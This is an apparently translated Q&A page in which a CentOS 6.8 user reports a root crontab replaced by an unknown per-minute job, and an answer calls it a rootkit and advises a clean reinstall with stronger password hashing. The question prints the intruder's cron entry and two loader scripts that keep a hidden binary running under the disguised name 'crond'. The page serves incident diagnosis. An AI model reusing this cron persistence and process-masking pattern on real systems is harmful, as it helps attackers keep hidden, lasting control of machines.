centos:root用户的crontab被删除和替换 - 恶意代码?

时间:2017-11-09 15:53:52

标签: cron centos centos6

我试图弄清楚我的/ var / spool / crontab / root是否被病毒或恶意代码覆盖:

我今天早上醒来,我的/ var / spool / crontab / root文件是空的,除了这行,这不是我写的:

* * * * * /usr/home/.bash_history/update > /dev/null 2>&1

我查找了设置为运行的更新文件,这是它包含的内容:

#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null

该更新文件调用名为 run 的文件,其中包含:

#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi

以下是/ usr / home目录的全部内容,我无法识别: enter image description here 我正在运行centos6.8

1 个答案:

答案 0 :(得分:0)

我认为你被黑客入侵,可能是有人使用可下载的rootkit。任何有调制解调器的白痴都可以使用它们,其中许多人在成功入侵后甚至不知道如何处理系统。

您可以做的最安全的事情是从头开始重新安装操作系统,这次使用更强的密码。 (对不起,“pa $$ w0rd”不要削减它。)你可能只是尝试更改密码并在系统中搜索任何可疑的东西,但很有可能改变了你永远不会认出的东西。

我有一个系统被黑了一次,他们取代了“ls”,“ps”,谁知道其他命令用替代品跳过他们的干预,使我们更难以100%确定我们找到了修正了他们所有的变化。

重新安装后,查看如何将阴影散列转换为使用SHA512。默认的散列算法存储在/etc/login.defs中,可能是MD5,现在还不够强大。但即使使用更强大的哈希,许多弱密码也会迅速陷入蛮力攻击。

当你参与其中时,你可能会获得CentOS 6.9,它将包含更多安全补丁。